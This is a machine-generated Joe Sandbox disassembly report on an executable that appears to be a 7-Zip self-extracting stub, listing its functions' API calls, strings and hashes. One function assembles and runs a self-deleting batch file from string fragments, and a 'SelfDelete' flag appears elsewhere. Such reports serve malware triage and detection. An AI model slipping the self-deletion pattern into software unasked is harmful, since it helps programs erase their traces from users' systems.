GetDlgItem.USER32(?,000004B4), ref: 00406569

Part of subcall function 00407164: SetWindowTextW.USER32(&Y@,?), ref: 0040716D

GetDlgItem.USER32(?,000004B5), ref: 00406591
GetWindowLongW.USER32(00000000,000000F0), ref: 00406596
GetDlgItem.USER32(?,000004B5), ref: 004065A9
SetWindowLongW.USER32(00000000), ref: 004065AC
GetSystemMenu.USER32(?,00000000,000004B4,00000000), ref: 004065D4
EnableMenuItem.USER32(00000000,0000F060,00000001), ref: 004065E5
GetDlgItem.USER32(?,000004B4), ref: 004065F3
SetFocus.USER32(00000000), ref: 004065F6
GetDlgItem.USER32(?,00000002), ref: 00406609
IsWindow.USER32(00000000), ref: 0040660C
GetDlgItem.USER32(?,00000002), ref: 0040661D
EnableWindow.USER32(00000000), ref: 00406620
GetDlgItem.USER32(?,000004B5), ref: 00406639
ShowWindow.USER32(00000000), ref: 0040663C

Memory Dump Source

Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd

Similarity

API ID: Item$Window$EnableLongMenuShow$FocusMessageSendSystemText
String ID:
API String ID: 2952050823-0
Opcode ID: 57d4f3c6cdc8830319e29171d8d729de1a7fb58ecde79828c7af3eacae6baeb4
Instruction ID: ed6bb61e75e4487655d7e3183e4994f63aacad4e0369b63f0d81d159f6d7a285
Opcode Fuzzy Hash: 57d4f3c6cdc8830319e29171d8d729de1a7fb58ecde79828c7af3eacae6baeb4
Instruction Fuzzy Hash: A9318570B807447BEA216B61ED4AF1B7AADEF84B14F018539F602B61F1CB7898508A5C

Function 004042AE Relevance: 22.9, APIs: 6, Strings: 7, Instructions: 144fileCOMMON

Download Yara Rule

APIs

GetDriveTypeW.KERNEL32(?), ref: 004042F5
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00404328
WriteFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 004043DA
CloseHandle.KERNEL32(00000000), ref: 004043EC
SetFileAttributesW.KERNEL32(?,00000000), ref: 00404402
ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 00404414

Strings

7ZSfx%03x.cmd, xrefs: 00404307
open, xrefs: 0040440E
if exist ", xrefs: 00404376
", xrefs: 00404368, 00404370, 004043B1
" goto Repeat, xrefs: 0040438F
del ", xrefs: 0040434E, 00404356, 0040439C
:Repeat, xrefs: 00404341

Memory Dump Source

Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd

Similarity

API ID: File$AttributesCloseCreateDriveExecuteHandleShellTypeWrite
String ID: "$" goto Repeat$7ZSfx%03x.cmd$:Repeat$del "$if exist "$open
API String ID: 3376544914-3467708659
Opcode ID: 4f415fd3ce4630a77a2767b630249be4faa78802f12aca1b91d4192a9d5e3af2
Instruction ID: cfc01dc45848d0242061778131bcc67b824a7b99476293ec523e887c5eca1a00
Opcode Fuzzy Hash: 4f415fd3ce4630a77a2767b630249be4faa78802f12aca1b91d4192a9d5e3af2
Instruction Fuzzy Hash: E6418571900108BECB04EBA1DC86EEE7B78EF14314F50442BF601760D1EB756E95C759

Function 0040DC87 Relevance: 16.6, APIs: 11, Instructions: 142COMMON

Download Yara Rule

APIs

_memcmp.LIBVCRUNTIME ref: 0040DCA0
_memcmp.LIBVCRUNTIME ref: 0040DCB3
_memcmp.LIBVCRUNTIME ref: 0040DCD0
_memcmp.LIBVCRUNTIME ref: 0040DCEE
_memcmp.LIBVCRUNTIME ref: 0040DD0C
_memcmp.LIBVCRUNTIME ref: 0040DDBA

Memory Dump Source

Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: e6c778c2375fa9186e5775a0fab15f2671213df02f5f1248b7536423324b6cd6
Instruction ID: 7f1a2b47ee085a34698ba4ac4c6dccb7e3e6f3a5c157eb67d943d60c885a0922
Opcode Fuzzy Hash: e6c778c2375fa9186e5775a0fab15f2671213df02f5f1248b7536423324b6cd6
Instruction Fuzzy Hash: D24140B1D4061AFBDB106A51DC41FE737AC9E61398B144436FC16BB281E33CEE4986D9

Function 00405953 Relevance: 16.6, APIs: 11, Instructions: 91windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 00405960
GetWindowLongW.USER32(00000000), ref: 00405967
DefWindowProcW.USER32(?,?,?,?), ref: 0040597E
CallWindowProcW.USER32(?,?,?,?,?), ref: 004059A3
GetSystemMetrics.USER32(00000031), ref: 004059B4
GetSystemMetrics.USER32(00000032), ref: 004059BB
GetWindowDC.USER32(?), ref: 004059CC
GetWindowRect.USER32(?,?), ref: 004059D9
DrawIconEx.USER32(00000000,?,?,?,?,?,?,?,00000003), ref: 00405A0E
ReleaseDC.USER32(?,00000000), ref: 00405A16

Memory Dump Source

Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd

Similarity

API ID: Window$MetricsProcSystem$CallDrawIconLongParentRectRelease
String ID:
API String ID: 2586545124-0
Opcode ID: dba0111c73405d8b6fdb3e741527c2f9d0d1760ce5ed60bcaf958e4deb923740
Instruction ID: b57515cd6bc49762bf2b78f9d28378ed93f25730ac5889bcbf98432be851fb3e
Opcode Fuzzy Hash: dba0111c73405d8b6fdb3e741527c2f9d0d1760ce5ed60bcaf958e4deb923740
Instruction Fuzzy Hash: 63310776580109BFCB019FA8ED88DEF7B79FB49310B008265F905A62A1C738DA119F65

Function 00406EA2 Relevance: 13.5, APIs: 9, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000004B3), ref: 00406EB8
SendMessageW.USER32(00000000,000000F4,00000000,00000001), ref: 00406ECA
GetDlgItem.USER32(?,000004B4), ref: 00406ED4
SendMessageW.USER32(00000000,000000F4,00000000,00000001), ref: 00406EE0
SendMessageW.USER32(?,00000401,?,00000000), ref: 00406EEF
GetDlgItem.USER32(?,?), ref: 00406EF7
SendMessageW.USER32(00000000,000000F4,00000001,00000001), ref: 00406F03
GetDlgItem.USER32(?,?), ref: 00406F0B
SetFocus.USER32(00000000,?,?,00406351,000004B4,000004B3,00000000,000004B4,00000000,?,00000000), ref: 00406F0E

Memory Dump Source

Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd

Similarity

API ID: ItemMessageSend$Focus
String ID:
API String ID: 3946207451-0
Opcode ID: 1e471e65c5e932c3fbaa041e028a1576c97294f49729507e83dc0406014e8c24
Instruction ID: 58add207b7a832a0b19d04ddd9afc6e980f616e20da4de3cbc8bd0fe57919996
Opcode Fuzzy Hash: 1e471e65c5e932c3fbaa041e028a1576c97294f49729507e83dc0406014e8c24
Instruction Fuzzy Hash: A2F0E1716C0319BAEE312B92DD8AF86BE1ADB44B54F05C061BB086D0E1CAF2D4509AA4

Function 00405C9E Relevance: 12.1, APIs: 8, Instructions: 72COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00405CAF
GetSystemMetrics.USER32(0000000B), ref: 00405CC8
GetSystemMetrics.USER32(0000003D), ref: 00405CD1
GetSystemMetrics.USER32(0000003E), ref: 00405CDA
SelectObject.GDI32(00000000,00000850), ref: 00405CF6
DrawTextW.USER32(00000000,?,000000FF,?,?), ref: 00405D0F
SelectObject.GDI32(00000000,?), ref: 00405D36
ReleaseDC.USER32(?,00000000), ref: 00405D43

Memory Dump Source

Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd

Similarity

API ID: MetricsSystem$ObjectSelect$DrawReleaseText
String ID:
API String ID: 2466489532-0
Opcode ID: a6cbcb2b4305a1e99beec2c3e81f55fcb86c146ba4bf7f5a6670c92b7bd8dfcd
Instruction ID: 785a51681e43107f2c62d15ba462b8ada5e6743f05e8fc22807d422f271eaa02
Opcode Fuzzy Hash: a6cbcb2b4305a1e99beec2c3e81f55fcb86c146ba4bf7f5a6670c92b7bd8dfcd
Instruction Fuzzy Hash: 4C211072A40615AFDB10DFA9DC8898BBBE8FF08360B11C96AF559D7260D374E940CF54

Function 0041857E Relevance: 12.1, APIs: 8, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00418575,00417C22), ref: 0041858C
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0041859A
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 004185B3
SetLastError.KERNEL32(00000000,?,00418575,00417C22), ref: 00418605

Memory Dump Source

Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 6fa56343ef3f16540fef6699b2d9e3dc6e7216b42e9f8f51ca78fff69c3e7a73
Instruction ID: ac70ee8bf5154da606db5642e10ef6a9fc2f3aee959224bcbbf31b09b368fc5b
Opcode Fuzzy Hash: 6fa56343ef3f16540fef6699b2d9e3dc6e7216b42e9f8f51ca78fff69c3e7a73
Instruction Fuzzy Hash: 9D01D4327193126EE634667A7C959D76B96EB627B8720023FF825401F1FF294C82558C

Function 0040147D Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 211COMMON

Download Yara Rule

APIs

Part of subcall function 00403744: lstrlenW.KERNEL32(?,00000001,00000000,?,004025AA,?,?,?,004018D8,?,hidcon,00000000,?,?,?,?), ref: 0040374C
Part of subcall function 00403744: lstrlenW.KERNEL32(?,?,004025AA,?,?,?,004018D8,?,hidcon,00000000,?,?,?,?), ref: 00403758
Part of subcall function 00403744: _wcsnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,004025AA,?,?,?,004018D8,?,hidcon,00000000,?,?,?,?), ref: 00403767

_wtol.API-MS-WIN-CRT-CONVERT-L1-1-0(005FE3BE,?,00421598,00000001,00405190), ref: 0040166A

Strings

GUIFlags, xrefs: 004015B4
GUIMode, xrefs: 00401598
OverwriteMode, xrefs: 00401557
MiscFlags, xrefs: 004015D0
SelfDelete, xrefs: 0040160A

Memory Dump Source

Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd

Similarity

API ID: lstrlen$_wcsnicmp_wtol
String ID: GUIFlags$GUIMode$MiscFlags$OverwriteMode$SelfDelete
API String ID: 24125944-3877767935
Opcode ID: 0337f66dd63acc117d86530b97949966e35fba64d3a2841f5e9750379575d787
Instruction ID: 1fefc3df929e48733e6ddbdade91eb5c6800b64d0e17ea6f62d14764a6b62cb0
Opcode Fuzzy Hash: 0337f66dd63acc117d86530b97949966e35fba64d3a2841f5e9750379575d787
Instruction Fuzzy Hash: 4D51AE21644312ABD634A6569CA067773DC9751764B78883FF483BB1F0E7BEC8C2921D

Function 0041A050 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 0041A07B
___except_validate_context_record.LIBVCRUNTIME ref: 0041A083
_ValidateLocalCookies.LIBCMT ref: 0041A111
__IsNonwritableInCurrentImage.LIBCMT ref: 0041A13C
_ValidateLocalCookies.LIBCMT ref: 0041A191

Strings

csm, xrefs: 0041A126

Memory Dump Source

Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 5e367eccd78a3872dda8812ee7a2a23bc053c39b26a0d8402ce192e78fa8da46
Instruction ID: 01afc47be6d3f144b50ad0a053c1f62df44e2d75cf478d3931296b200fca9e1b
Opcode Fuzzy Hash: 5e367eccd78a3872dda8812ee7a2a23bc053c39b26a0d8402ce192e78fa8da46
Instruction Fuzzy Hash: D141D834A01208ABCF10DF69C844ADFBBB5BF44328F14815BEC159B352D739D9A5CB9A

Function 00407057 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 93windowCOMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0040708F
GetDlgItem.USER32(?,000004B8), ref: 004070AD
SendMessageW.USER32(00000000,00000402,00000000,00000000), ref: 004070B8
wsprintfW.USER32 ref: 004070D6
GetDlgItem.USER32(?,000004B5), ref: 004070F4

Strings

%d%%, xrefs: 004070D0

Memory Dump Source

Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd

Similarity

API ID: Item$MessageSendUnothrow_t@std@@@__ehfuncinfo$??2@wsprintf
String ID: %d%%
API String ID: 3151147563-1518462796
Opcode ID: 9c7d150db5aca2ccf60d2e64cbfeead02c927d258a63e72dc630f0809d078dcc
Instruction ID: 45b03464c2a1215cb0754d0bb0fd224668146db83d2290658149ed07c9b23932
Opcode Fuzzy Hash: 9c7d150db5aca2ccf60d2e64cbfeead02c927d258a63e72dc630f0809d078dcc
Instruction Fuzzy Hash: AA31B471A00204BFDB01EBA5DC86EEE73B9EB48744F00447AF601762E1DB79BE118759

Function 0040FC97 Relevance: 10.6, APIs: 7, Instructions: 90COMMON

Download Yara Rule

APIs

_memcmp.LIBVCRUNTIME ref: 0040FCB0
_memcmp.LIBVCRUNTIME ref: 0040FCC3
_memcmp.LIBVCRUNTIME ref: 0040FCE0
_memcmp.LIBVCRUNTIME ref: 0040FCFB
_memcmp.LIBVCRUNTIME ref: 0040FD16

Memory Dump Source

Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: 9a34e416c6d01be04e4d389371424d3d9bd6ecd578c4bd22d66e4d3a50754ddc
Instruction ID: ef3433f4d3ef313e7e3bfcab394600dd2037127a29c20f0efe927f51a72f2482
Opcode Fuzzy Hash: 9a34e416c6d01be04e4d389371424d3d9bd6ecd578c4bd22d66e4d3a50754ddc
Instruction Fuzzy Hash: A52196B1A0060EA7D714AA11DC42FE7735D9E61358B144137FC16AA242F238DF8A86D9

Function 00419780 Relevance: 9.3, APIs: 6, Instructions: 276COMMONLIBRARYCODE

Download Yara Rule

APIs

_ValidateScopeTableHandlers.LIBCMT ref: 00419890
__FindPESection.LIBCMT ref: 004198AA

Memory Dump Source

Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd

Similarity

API ID: FindHandlersScopeSectionTableValidate
String ID:
API String ID: 876702719-0
Opcode ID: e9cfddb422d051c3b26c839b4d7996d2eaded1cc3d2d9dc8930febb3ecd9b480
Instruction ID: 0f41870931d5904cea21ba34ee88dc18a7d4276d4147a185d6bf4a9c9742233d
Opcode Fuzzy Hash: e9cfddb422d051c3b26c839b4d7996d2eaded1cc3d2d9dc8930febb3ecd9b480
Instruction Fuzzy Hash: D4A1B1B1A002158FDB24CF58D9A07EEB7A4FF45750F18422BD815A7391D739ED81CB98

Function 00414109 Relevance: 9.1, APIs: 6, Instructions: 80COMMON

Download Yara Rule

APIs

_memcmp.LIBVCRUNTIME ref: 00414122
_memcmp.LIBVCRUNTIME ref: 00414135
_memcmp.LIBVCRUNTIME ref: 0041414F
_memcmp.LIBVCRUNTIME ref: 0041416A
_memcmp.LIBVCRUNTIME ref: 00414185

Memory Dump Source

Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: 755d6d7f784d41f9d0f56c91fe5a0e06227a2ae012f9774440b6a7981359c4ce
Instruction ID: 20cb65895c826b56d1a94ccbeb3a35201986642efdbee324d13c0b9210626774
Opcode Fuzzy Hash: 755d6d7f784d41f9d0f56c91fe5a0e06227a2ae012f9774440b6a7981359c4ce
Instruction Fuzzy Hash: C121A4B1A0020ABBD7046B11DC46FEB735D9EB1388B144127FC159A201E328DEC586DD

Function 004058B9 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 56COMMON

Download Yara Rule

APIs

SHBrowseForFolderW.SHELL32(?), ref: 004058E7
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00405904
SHGetMalloc.SHELL32(00000000), ref: 0040592E

Part of subcall function 00406FA9: GetDlgItem.USER32(?,000004B6), ref: 00406FBD
Part of subcall function 00406FA9: SetFocus.USER32(00000000,?,00000000,?,00405926,?), ref: 00406FC0
Part of subcall function 00406FA9: GetDlgItem.USER32(?,000004B6), ref: 00406FD0
Part of subcall function 00406FA9: GetDlgItem.USER32(?,000004B6), ref: 00406FE8
Part of subcall function 00406FA9: SendMessageW.USER32(00000000,000000B1,0000002E,0000002E), ref: 00406FF2

Strings

;a, xrefs: 00405914
A, xrefs: 004058DF

Memory Dump Source

Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd

Similarity

API ID: Item$BrowseFocusFolderFromListMallocMessagePathSend
String ID: ;a$A
API String ID: 3792050300-2582615566
Opcode ID: 7efb4b2723e932306cd541c44e8648dae83d9c9574a8583efd3a6c56a4c5a57b
Instruction ID: b0b31721cd8c0189f0528663253ad488fc03ccd8e1ca586dc21598c34889cee9
Opcode Fuzzy Hash: 7efb4b2723e932306cd541c44e8648dae83d9c9574a8583efd3a6c56a4c5a57b
Instruction Fuzzy Hash: 33112B75A11215ABDB10DBA5D988BDE77A8AF44314F1001AAE406E7280DB38DE04CE69

Function 00405EDC Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(uxtheme,?,0040646A,000004B1,00000000,?,?,?,?,000004B4,00000000,000004B3,00000000,?,00000000), ref: 00405EE4
GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 00405EF5
GetWindow.USER32(?,00000005), ref: 00405F18

Strings

SetWindowTheme, xrefs: 00405EEF
uxtheme, xrefs: 00405EDD

Memory Dump Source

Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd

Similarity

API ID: AddressLibraryLoadProcWindow
String ID: SetWindowTheme$uxtheme
API String ID: 1082215438-1369271589
Opcode ID: 9511b62c2303d872ebfb60c4b5267cb138e73ad263504c50661232451f17aa29
Instruction ID: 0b2212db0201ca8ca1f2c524a03070d00ecb2aaf5b67f8b997d7619c4319ddac
Opcode Fuzzy Hash: 9511b62c2303d872ebfb60c4b5267cb138e73ad263504c50661232451f17aa29
Instruction Fuzzy Hash: E7E092316C4A2272C63123256C4DFDB2D59CB85B517164037F910B62C1DBBCC8418E9C

Function 004012DC Relevance: 7.6, APIs: 5, Instructions: 70COMMON

Download Yara Rule

APIs

_memcmp.LIBVCRUNTIME ref: 004012F5
_memcmp.LIBVCRUNTIME ref: 00401308
_memcmp.LIBVCRUNTIME ref: 00401322
_memcmp.LIBVCRUNTIME ref: 0040133D
_memcmp.LIBVCRUNTIME ref: 00401358

Memory Dump Source

Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: b67462ceb501a52f5732ad0ca6f62dbadbc4bb69b2ef33b926461c9adb50a524
Instruction ID: 000c9580e2e9c01a743a6380ceb9dcf40b112b1a4b9ff7dab20a78686c8967f6
Opcode Fuzzy Hash: b67462ceb501a52f5732ad0ca6f62dbadbc4bb69b2ef33b926461c9adb50a524
Instruction Fuzzy Hash: E9119B7164060EBBE7045611CC82FEBB35CAF61388B148137FC15AA651E33CDE8646DD

Function 00411B14 Relevance: 7.6, APIs: 5, Instructions: 70COMMON

Download Yara Rule

APIs

_memcmp.LIBVCRUNTIME ref: 00411B2D
_memcmp.LIBVCRUNTIME ref: 00411B40
_memcmp.LIBVCRUNTIME ref: 00411B5A
_memcmp.LIBVCRUNTIME ref: 00411B75
_memcmp.LIBVCRUNTIME ref: 00411B90

Memory Dump Source

Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: 245b298a78602dd961001b5a290a7a2e175681dfe6c9ea360cda123e2a1e23ea
Instruction ID: 505f67fccf6a5708d7b923504a75a841fcdfc1dbb003a3aaa0af8f45a1e9c664
Opcode Fuzzy Hash: 245b298a78602dd961001b5a290a7a2e175681dfe6c9ea360cda123e2a1e23ea
Instruction Fuzzy Hash: 8411B2B1A0420ABBD7046B11DC42FEB735CAF61348B148127FD199A252F228EEC586DD

Function 00406FA9 Relevance: 7.5, APIs: 5, Instructions: 31windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000004B6), ref: 00406FBD
SetFocus.USER32(00000000,?,00000000,?,00405926,?), ref: 00406FC0
GetDlgItem.USER32(?,000004B6), ref: 00406FD0

Part of subcall function 00407164: SetWindowTextW.USER32(&Y@,?), ref: 0040716D

GetDlgItem.USER32(?,000004B6), ref: 00406FE8
